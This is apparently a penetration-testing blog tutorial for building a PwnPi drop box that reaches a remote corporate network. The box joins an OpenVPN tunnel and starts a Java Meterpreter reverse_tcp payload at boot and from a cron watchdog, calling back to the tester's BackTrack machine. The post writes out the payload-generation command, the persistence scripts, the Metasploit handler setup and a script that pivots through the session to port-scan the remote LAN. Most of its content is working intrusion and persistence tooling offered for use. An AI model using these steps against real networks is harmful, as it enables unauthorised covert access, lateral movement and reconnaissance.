reverse java-meterpreter

Setup:

  • A Windows 7 box running the OpenVPN server
    (192.168.0.10; 10.0.0.1)
  • BackTrack 5 (VirtualBox on my Win7 server), connected as an OpenVPN client via LAN
    (192.168.0.60; 10.0.0.4)
  • PwnPi, connected as an OpenVPN client to the Win7 server over the internet
    (gets its IP from DHCP on the remote [corporate] LAN; 10.0.0.3)

First, set up an OpenVPN server. This is my server.ovpn config file:

local 192.168.0.10
port 4567
proto udp
mode server
dev tap
dev-node openvpn
tun-mtu 1500
ifconfig 10.0.0.1 255.255.255.0
ifconfig-pool 10.0.0.2 10.0.0.9
# lets the BackTrack client and the PwnPi reach each other through the server
client-to-client
tls-server
# Windows paths need doubled backslashes in OpenVPN configs
dh   x:\\openvpn\\keys\\dh1024.pem
ca   x:\\openvpn\\keys\\ca.crt
key  x:\\openvpn\\keys\\server.key
cert x:\\openvpn\\keys\\server.crt
client-config-dir x:\\openvpn\\ccd
comp-lzo
push "route-gateway 10.0.0.1"

status "X:\\openvpn\\log\\openvpn-status.log"
# log (truncate on start) and log-append are alternatives; use only one of them
log-append "X:\\openvpn\\log\\openvpn.log"
verb 5

The second step is generating keys and certificates for the server and each client. I won't go into that; just google it
or take a look here. One caveat: dh1024.pem in the config above is a 1024-bit Diffie-Hellman parameter file, which is weak by today's standards; generate a 2048-bit (or larger) one and point the dh line at it.

cat /etc/openvpn/client.conf

client
dev tap
proto udp
remote YOURHOSTNAMEHERE YOURPORTHERE
# note: for BT use the server's LAN IP, for the PwnPi a DynDNS name
resolv-retry infinite
nobind
persist-key
persist-tun
ca /etc/openvpn/ca.crt
# OpenVPN does not expand wildcards: put this client's actual key/cert file names here
key /etc/openvpn/*.key
cert /etc/openvpn/*.crt
# optional hardening: refuse a peer that presents a client certificate as the server
# (requires the server certificate to carry the server EKU)
# remote-cert-tls server
comp-lzo
verb 6
mute 50
log /var/log/openvpn.log
tun-mtu 1500

I'm going this way because I want to use Metasploit on my local BackTrack box and reach the remote network through the PwnPi. Running Metasploit directly on the PwnPi is ridiculously slow, especially over Tor.
Going this way also gives me the option of using Armitage on the BackTrack machine.
I also want to use Meterpreter, because it has nice pivoting features.
So I created a java/meterpreter/reverse_tcp payload and run it on PwnPi startup,
connecting back to my BackTrack machine over the OpenVPN LAN. Since PwnPi 3.0 comes with Metasploit preinstalled, just cd /pentest/exploits/framework3/ and type:

./msfpayload java/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=4444 R > /root/meterpreter.jar

(msfpayload is gone from current Metasploit releases; the equivalent there is msfvenom with -p java/meterpreter/reverse_tcp, the same LHOST/LPORT and -f jar.) I made another lazy script to fire up the meterpreter payload and keep it running:

#!/bin/sh
# checkjava: run from cron; (re)start the meterpreter jar if it is not running.
JAR=/root/meterpreter.jar
LOG=/root/java.log

# Look for our java process. 'grep -v grep' drops the grep itself, 'grep -v $0'
# drops this script, whose name also contains "java".
if ps ax | grep -v grep | grep -v "$0" | grep "java -jar $JAR" > /dev/null
then
    echo "`date`: meterpreter running" >> "$LOG"
else
    echo "meterpreter is not running"
    echo "Starting service"
    echo "`date`: meterpreter not running - starting now!" >> "$LOG"
    # Start it detached, otherwise this script (and the cron job) would block
    # for the lifetime of the java process.
    nohup bash /root/startjava > /dev/null 2>&1 &
fi

Save it as checkjava

java -jar /root/meterpreter.jar

Save it as startjava

The next step is creating a cron job that checks every two minutes whether Meterpreter is running:

*/2 * * * * bash /root/checkjava

Make sure OpenVPN is enabled on startup. The PwnPi should now connect to our virtual network and run the meterpreter payload on boot.

[screenshot: meterpreter.listen]

Now go to your BackTrack box and start Armitage. Run a multi/handler with the java/meterpreter/reverse_tcp payload. Set ExitOnSession to false and start it as a job, so the handler keeps listening and the cron-restarted payload can reconnect after a reboot or a dropped session:

use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.0.0.4
set LPORT 4444
set ExitOnSession false
exploit -j

Now power up the PwnPi and watch the m451c happen !!!1!
[screenshot: meterpreter.connected]

Now set up a pivot via Metasploit and scan the remote IP range for other devices. Since run arp_scanner won't work on java/meterpreter (it relies on the native Windows Meterpreter), I'm going to use portscan_tcp.

[screenshot: meterpreter.pivot.portscan.2]
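The pivot step spelled out as an msfconsole resource script, an added example that is not part of the original post: it routes the remote range through the Java Meterpreter session and runs the TCP port scanner over that route. The session id (1) and the corporate range (192.168.1.0/24) are assumptions; check the real range first with sessions -i 1 followed by ifconfig at the meterpreter prompt.

```text
# pivot.rc: run with "resource /root/pivot.rc" from msfconsole once the
# PwnPi session is in. Assumptions: the PwnPi session is id 1 and the
# corporate LAN is 192.168.1.0/24 (read the real range from ifconfig in
# the session before editing these values).

# send traffic for the remote range through the Java Meterpreter session
route add 192.168.1.0 255.255.255.0 1
route print

# TCP connect scan of the pivoted range. Keep the port list short: every
# probe crosses the VPN, the Pi's uplink and the Java Meterpreter.
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,135,139,443,445,3389
set THREADS 10
run
```

Hosts found this way show up in Armitage's target view as well, since it shares the framework's database; once a target is known, the same route carries the exploit modules you run against it.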

Voilà!
